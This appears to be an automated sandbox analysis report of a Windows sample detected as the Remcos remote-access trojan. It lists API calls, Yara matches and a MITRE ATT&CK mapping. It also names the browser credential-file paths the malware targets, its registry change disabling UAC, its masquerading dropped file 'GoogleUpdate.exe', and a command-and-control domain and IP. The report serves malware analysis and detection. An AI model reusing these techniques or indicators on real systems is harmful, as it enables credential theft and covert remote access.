Source: GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managers.net
Source: GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000000A.00000002.4125655401.0000000002062000.00000004.00000020.00020000.00000000.sdmp, GoogleUpdate.exe, 0000000A.00000002.4125655401.0000000002040000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: GoogleUpdate.exe, 0000000A.00000002.4124186576.000000000067B000.00000004.00000020.00020000.00000000.sdmp, logs.dat.10.dr	Binary or memory string: [Program Manager]

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

Code function: 0_2_004329DA cpuid

0_2_004329DA

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: EnumSystemLocalesW,	0_2_0044F17B
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: EnumSystemLocalesW,	0_2_0044F130
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: EnumSystemLocalesW,	0_2_0044F216
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0044F2A3
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: GetLocaleInfoA,	0_2_0040E2BB
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: GetLocaleInfoW,	0_2_0044F4F3
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0044F61C
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: GetLocaleInfoW,	0_2_0044F723
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0044F7F0
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: EnumSystemLocalesW,	0_2_00445914
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: GetLocaleInfoW,	0_2_00445E1C
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0044EEB8
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: GetLocaleInfoA,	10_2_0040E2BB
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: EnumSystemLocalesW,	10_2_0044F17B
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: EnumSystemLocalesW,	10_2_0044F130
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: EnumSystemLocalesW,	10_2_0044F216
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	10_2_0044F2A3
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: GetLocaleInfoW,	10_2_0044F4F3
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	10_2_0044F61C
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: GetLocaleInfoW,	10_2_0044F723
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	10_2_0044F7F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: EnumSystemLocalesW,	10_2_00445914
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: GetLocaleInfoW,	10_2_00445E1C
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	10_2_0044EEB8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoA,	13_2_02D5E2BB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	13_2_02D9F2A3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: EnumSystemLocalesW,	13_2_02D9F216
Source: C:\Windows\SysWOW64\svchost.exe	Code function: EnumSystemLocalesW,	13_2_02D9F17B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: EnumSystemLocalesW,	13_2_02D9F130
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	13_2_02D9F61C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	13_2_02D9F7F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoW,	13_2_02D9F723
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoW,	13_2_02D9F4F3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: EnumSystemLocalesW,	13_2_02D95914
Source: C:\Windows\SysWOW64\svchost.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	13_2_02D9EEB8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoW,	13_2_02D95E1C
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: EnumSystemLocalesW,	15_2_0044F17B
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: EnumSystemLocalesW,	15_2_0044F130
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: EnumSystemLocalesW,	15_2_0044F216
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	15_2_0044F2A3
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: GetLocaleInfoA,	15_2_0040E2BB
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: GetLocaleInfoW,	15_2_0044F4F3
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	15_2_0044F61C
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: GetLocaleInfoW,	15_2_0044F723
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	15_2_0044F7F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: EnumSystemLocalesW,	15_2_00445914
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: GetLocaleInfoW,	15_2_00445E1C
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	15_2_0044EEB8
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: EnumSystemLocalesW,	18_2_0044F17B
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: EnumSystemLocalesW,	18_2_0044F130
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: EnumSystemLocalesW,	18_2_0044F216
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	18_2_0044F2A3
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: GetLocaleInfoA,	18_2_0040E2BB
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: GetLocaleInfoW,	18_2_0044F4F3
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	18_2_0044F61C
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: GetLocaleInfoW,	18_2_0044F723
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	18_2_0044F7F0
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: EnumSystemLocalesW,	18_2_00445914
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: GetLocaleInfoW,	18_2_00445E1C
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	18_2_0044EEB8

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

Code function: 0_2_0040A0B0 GetLocalTime,wsprintfW,

0_2_0040A0B0

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

Code function: 0_2_004195F8 GetComputerNameExW,GetUserNameW,

0_2_004195F8

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe

Code function: 0_2_004468DC _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_004468DC

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disables UAC (registry)

Source: C:\Windows\SysWOW64\reg.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Jump to behavior

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: DB5rQYsfd6.exe, type: SAMPLE
Source: Yara match	File source: 20.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.GoogleUpdate.exe.2a00000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.svchost.exe.2d50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.svchost.exe.2d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.GoogleUpdate.exe.6abe60.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.GoogleUpdate.exe.2a00000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.GoogleUpdate.exe.6abe60.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1840917255.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1664470390.0000000000456000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1756643993.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1917821912.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.1836764394.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4123857872.0000000003230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.1919217572.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1919786507.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1837263021.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.1762040408.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.1840006735.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000000.1917703042.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1762879487.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1689947215.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.1756098739.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DB5rQYsfd6.exe PID: 7308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 7888, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7944, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 8112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 8180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 1184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 1608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 7592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 7844, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\bootdata\logs.dat, type: DROPPED
Source: Yara match	File source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, type: DROPPED

Contains functionality to steal Chrome passwords or cookies

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data	0_2_0040A953
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data	10_2_0040A953
Source: C:\Windows\SysWOW64\svchost.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data	13_2_02D5A953
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data	15_2_0040A953
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data	18_2_0040A953

Contains functionality to steal Firefox passwords or cookies

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	0_2_0040AA71
Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: \key3.db	0_2_0040AA71
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	10_2_0040AA71
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: \key3.db	10_2_0040AA71
Source: C:\Windows\SysWOW64\svchost.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	13_2_02D5AA71
Source: C:\Windows\SysWOW64\svchost.exe	Code function: \key3.db	13_2_02D5AA71
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	15_2_0040AA71
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: \key3.db	15_2_0040AA71
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	18_2_0040AA71
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: \key3.db	18_2_0040AA71

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: DB5rQYsfd6.exe, type: SAMPLE
Source: Yara match	File source: 20.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.GoogleUpdate.exe.2a00000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.svchost.exe.2d50000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.svchost.exe.2d50000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DB5rQYsfd6.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.0.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.GoogleUpdate.exe.6abe60.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.GoogleUpdate.exe.2a00000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.GoogleUpdate.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.GoogleUpdate.exe.6abe60.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.1840917255.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1664470390.0000000000456000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.1756643993.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.1917821912.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000000.1836764394.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4123857872.0000000003230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.1919217572.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.1919786507.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.1837263021.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.1762040408.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000000.1840006735.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000000.1917703042.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1668817939.0000000000456000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.1762879487.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.1689947215.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4124186576.000000000068D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.1756098739.0000000000456000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4126318500.0000000002A00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.4123475358.0000000002D50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DB5rQYsfd6.exe PID: 7308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 7888, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 7944, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 8112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 8180, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 1184, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 1608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 7592, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: GoogleUpdate.exe PID: 7844, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\bootdata\logs.dat, type: DROPPED
Source: Yara match	File source: C:\ProgramData\GoogleDat\GoogleUpdate.exe, type: DROPPED

Source: C:\Users\user\Desktop\DB5rQYsfd6.exe	Code function: cmd.exe	0_2_0040567A
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: cmd.exe	10_2_0040567A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: cmd.exe	13_2_02D5567A
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: cmd.exe	15_2_0040567A
Source: C:\ProgramData\GoogleDat\GoogleUpdate.exe	Code function: cmd.exe	18_2_0040567A

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	11 Scripting	Valid Accounts	12 Native API	11 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	11 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	112 Command and Scripting Interpreter	1 DLL Side-Loading	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	211 Input Capture	1 Account Discovery	Remote Desktop Protocol	211 Input Capture	22 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	2 Service Execution	1 Windows Service	1 Windows Service	2 Obfuscated Files or Information	2 Credentials In Files	1 System Service Discovery	SMB/Windows Admin Shares	3 Clipboard Data	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	11 Registry Run Keys / Startup Folder	322 Process Injection	1 DLL Side-Loading	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	22 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	11 Registry Run Keys / Startup Folder	1 Modify Registry	LSA Secrets	33 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Virtualization/Sandbox Evasion	Cached Domain Credentials	121 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	1 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	322 Process Injection	Proc Filesystem	2 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
DB5rQYsfd6.exe	89%	ReversingLabs	Win32.Trojan.Remcos
DB5rQYsfd6.exe	85%	Virustotal		Browse
DB5rQYsfd6.exe	100%	Avira	BDS/Backdoor.Gen
DB5rQYsfd6.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\install.vbs	100%	Avira	VBS/Runner.VPD
C:\ProgramData\GoogleDat\GoogleUpdate.exe	100%	Avira	BDS/Backdoor.Gen
C:\ProgramData\GoogleDat\GoogleUpdate.exe	100%	Joe Sandbox ML
C:\ProgramData\GoogleDat\GoogleUpdate.exe	89%	ReversingLabs	Win32.Trojan.Remcos

Source	Detection	Scanner	Label	Link
apleegodfivem.ddns.net	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
apleegodfivem.ddns.net	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
apleegodfivem.ddns.net	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://geoplugin.net/json.gp	GoogleUpdate.exe	false		high
http://geoplugin.net/json.gp/C	DB5rQYsfd6.exe, GoogleUpdate.exe.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.50.242.157	unknown	Canada		16276	OVHFR	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1589220
Start date and time:	2025-01-11 20:06:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	DB5rQYsfd6.exe renamed because original name is a hash value
Original Sample Name:	991e707e324731f86a43900e34070808.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@26/4@49/1
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 100% Number of executed functions: 51 Number of non-executed functions: 354
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, consent.exe, RuntimeBroker.exe, ShellExperienceHost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 172.202.163.200, 13.107.246.45
